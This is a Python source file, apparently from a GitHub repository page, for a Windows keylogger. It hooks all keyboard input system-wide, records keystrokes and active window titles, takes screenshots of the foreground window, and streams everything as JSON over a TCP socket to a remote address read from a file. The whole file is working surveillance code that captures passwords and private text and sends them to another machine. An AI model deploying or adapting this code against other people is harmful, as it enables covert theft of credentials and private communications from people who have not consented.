-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathrem.py
200 lines (170 loc) · 5.35 KB
/
rem.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
#coding=utf-8
import threading
import pyHook
import pythoncom
import time
import json
import socket
import sys
PY2=sys.version_info[0]==2
queue=__import__('Queue' if PY2 else 'queue')
SPECIAL_KEYS={
'Lcontrol','Lmenu','Lwin','Rcontrol','Rmenu','Rwin',
'Escape','Snapshot','Home','End','Prior','Next','Return',
'F1','F2','F3','F4','F5','F6','F7','F8','F9','F10','F11','F12',
}
MOD_KEYS={
'Lcontrol','Lmenu','Lwin','Rcontrol','Rmenu','Rwin',
}
SHIFT={'Lshift','Rshift'}
NICKNAME={
'Up': '↑', 'Down': '↓', 'Left': '←', 'Right': '→', 'Tab': '⇥',
'Return': '⏎', 'Space': '⎵', 'Back': '◁', 'Delete': '◀',
'Escape': 'Esc', 'Snapshot': 'PrtSc', 'Prior': 'PgUp', 'Next': 'PgDn',
'Lcontrol': 'Ctrl', 'Lmenu': 'Alt', 'Lwin': 'Win',
'Rcontrol': 'Ctrl', 'Rmenu': 'Alt', 'Rwin': 'Win',
'Oem_Minus': '-', 'Oem_Plus': '=', 'Oem_Comma': ',', 'Oem_Period': '.',
'Oem_5': '\\', 'Oem_3': '`', 'Oem_2': '/', 'Oem_1': ';', 'Oem_7': "'", 'Oem_4': '[', 'Oem_6': ']',
}
STRING_TIMEOUT=2
SCREENSHOT_THRESHOLD_TIME=.5
with open('addr.txt','r') as f:
RAM_ADDR=f.read().strip().split(':')
RAM_ADDR[1]=int(RAM_ADDR[1])
print(RAM_ADDR)
last_screenshot_time=0
def screenshot():
import win32gui
from PIL import ImageGrab
import base64
from io import BytesIO
global last_screenshot_time
if time.time()-last_screenshot_time<SCREENSHOT_THRESHOLD_TIME:
return None
last_screenshot_time=time.time()
hwnd=win32gui.GetForegroundWindow()
img_file=BytesIO()
ImageGrab.grab(win32gui.GetWindowRect(hwnd)).save(img_file,'png')
return base64.b64encode(img_file.getvalue()).decode()
class Chunk(object):
__slots__=['type','time','value','image']
def __init__(self,type_,value):
self.time=time.strftime('%H:%M:%S',time.localtime())
self.type=type_
self.value=value
self.image=None
def json(self):
return json.dumps({
'type': self.type,
'time': self.time,
'value': self.value,
'image': self.image,
})
class Pumper:
def __init__(self):
self.msg=None
self.chunks=[]
self.lock=threading.Lock()
threading.Thread(target=self.connector).start()
def connector(self):
while True:
try:
print('connecting to ram')
s=socket.socket()
s.connect(tuple(RAM_ADDR))
print('connected')
while True:
with self.lock:
buf='\n'.join(self.chunks)
if buf:
print('send %d chars'%len(buf))
s.send(buf.encode('utf-8'))
s.send(b'\n')
with self.lock:
self.chunks=[]
time.sleep(.5)
except socket.error:
time.sleep(1)
def pump(self):
with self.lock:
if self.msg is not None:
self.chunks.append(self.msg.json())
self.msg=None
def create(self,typ,value):
self.pump()
with self.lock:
self.msg=Chunk(typ,value)
def img(self):
with self.lock:
if self.msg:
self.msg.image=screenshot()
def breakout(self,typ,value,img=False):
chk=Chunk(typ,value)
if img:
chk.image=screenshot()
with self.lock:
self.chunks.append(chk.json())
pumper=Pumper()
holdkey=set()
last_time=0
current_title=None
status='idle'
kqueue=queue.Queue()
def hooker():
hm=pyHook.HookManager()
hm.SubscribeKeyDown(keydown)
hm.SubscribeKeyUp(keyup)
hm.HookKeyboard()
print('Started.')
pythoncom.PumpMessages()
def worker(event):
def proc():
return NICKNAME.get(event.Key)
global status
global last_time
global current_title
window_name=(event.WindowName or '(None)').decode('gbk', 'ignore') if PY2 else (event.WindowName or '(None)')
if current_title!=window_name:
current_title=window_name
pumper.breakout('title', [event.Window,window_name], img=True)
if status=='string':
if event.Key in SPECIAL_KEYS or time.time()-last_time>STRING_TIMEOUT:
status='idle'
if status=='idle':
if event.Key in SPECIAL_KEYS:
status='modkey'
pumper.create(status,[])
else:
status='string'
pumper.create(status,'')
pumper.img()
if status=='string':
pumper.msg.value+=(proc() or (chr(event.Ascii) if event.Ascii else '⍰'))
else: #status=='modkey'
if any((s in holdkey for s in SHIFT)):
pumper.msg.value.append('Shift')
for s in SHIFT:
holdkey.discard(s)
pumper.msg.value.append(proc() or event.Key)
if event.Key=='Return':
pumper.img()
last_time=time.time()
def queue_finder():
while True:
worker(kqueue.get())
def keydown(event):
holdkey.add(event.Key)
if event.Key not in SHIFT:
kqueue.put(event)
return True
def keyup(event):
global status
holdkey.discard(event.Key)
if status=='modkey' and not holdkey:
pumper.pump()
status='idle'
return True
if __name__=='__main__':
#print(len(screenshot()))
threading.Thread(target=queue_finder).start()
hooker()